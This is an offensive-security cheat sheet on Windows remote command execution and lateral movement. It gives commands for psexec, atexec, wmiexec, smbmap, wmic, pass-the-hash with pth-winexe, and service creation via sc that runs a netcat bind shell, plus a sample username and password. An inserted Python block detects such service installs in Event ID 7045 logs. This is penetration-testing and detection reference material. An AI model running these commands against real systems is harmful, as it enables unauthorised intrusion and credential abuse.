akde/infosec

Information security is ultimately about managing risk


With username/password

With psexec (Prerequisites: the ADMIN$ share is available and the user is a member of the local Administrators group on the target)

  • On Linux
    psexec.py Domain.local/User@$target cmd.exe
  • On Windows
    • If you have username and password
      ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
    • If you have a TGS stored in klist
      ./PsExec64.exe \\FILES04 cmd

With psexec via Metasploit

use exploit/windows/smb/psexec

With atexec (Impacket)

atexec.py dom/user:pass@$target cmd.exe

With wmiexec

wmiexec.py domain.local/$user:$password@$target

With Smbmap

smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target

With Wmic (To run a command on multiple systems, replace /node:$target with /node:@hosts.txt and put the targets, one per line, into that file.)

wmic /node:$target /user:$user /password:$password process call create $your_command

Via the SC Service Controller (This connects to $target via SMB, creates a service and then starts it. Caution: the service will be killed after 30 seconds because the binary probably doesn't conform to the service standard and never calls the service control API. Work around this by calling cmd.exe /k real.exe and letting cmd.exe start the malicious process.)

net use \\$target $password /u:$domain\$user
sc \\$target create $servicename binpath= "cmd.exe /k c:\temp\nc.exe -l -p 2222 -e cmd.exe"
sc \\$target start $servicename
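A defender-side counterpart to the service-creation technique above, added here as an example and not part of the original notes: a small triage function over constructed records shaped like Windows System log Event ID 7045 ("A service was installed in the system") that flags the traces these commands leave, such as a cmd.exe /k wrapper as the service binary or the PSEXESVC service PsExec installs. The sample records and the trusted-directory list are assumptions for the demonstration.

```python
import re

# Constructed sample records (not real logs) with the fields of a 7045 event.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "updsvc",
     "ImagePath": r"cmd.exe /k c:\temp\nc.exe -l -p 2222 -e cmd.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "AccountName": ""},
]

# A shell used as the service binary (the cmd.exe /k trick from the notes above).
SHELL_WRAPPER = re.compile(r"^(?:\S*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\s+/[kc]\b", re.IGNORECASE)
# Service names installed by well-known remote-execution tooling.
KNOWN_TOOL_SERVICES = {"PSEXESVC"}
# Assumed baseline of directories a legitimate service binary normally lives in.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\program files", r"%systemroot%\system32")


def classify_service_install(event):
    """Return a reason string when a 7045 record looks like remote-exec tooling, else None."""
    if event.get("EventID") != 7045:
        return None
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "").strip().strip('"')
    if name.upper() in KNOWN_TOOL_SERVICES:
        return f"known remote-exec service installed: {name}"
    if SHELL_WRAPPER.match(path):
        return f"service binary is a shell wrapper: {path}"
    if not path.lower().startswith(TRUSTED_DIRS):
        return f"service binary outside trusted directories: {path}"
    return None


def triage(events):
    """Map each flagged service name to the reason it was flagged."""
    findings = {}
    for ev in events:
        reason = classify_service_install(ev)
        if reason:
            findings[ev["ServiceName"]] = reason
    return findings


if __name__ == "__main__":
    for svc, why in triage(SAMPLE_EVENTS).items():
        print(f"[!] {svc}: {why}")
```

A 7045 from a shell wrapper followed within about 30 seconds by a Service Control Manager timeout or failure for the same service is the other half of the pattern described above.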

With username/hash

With pth-winexe (Note: the user format is user%lm:ntlm. pth-winexe actually needs only the NTLM hash, but it won't work if no LM hash is given. Because sometimes no LM hash is available, it is fine to use a dummy LM hash as in the example below.)

pth-winexe -U $user%aad3b435b51404eeaad3b435b51404ee:$NTLM //$target cmd

With wmiexec (Requirement: the target has the ADMIN$ share available, and the user needs local administrator privileges on it.)

impacket-wmiexec -hashes :aad3b435b51404eeaad3b435b51404ee user@$target
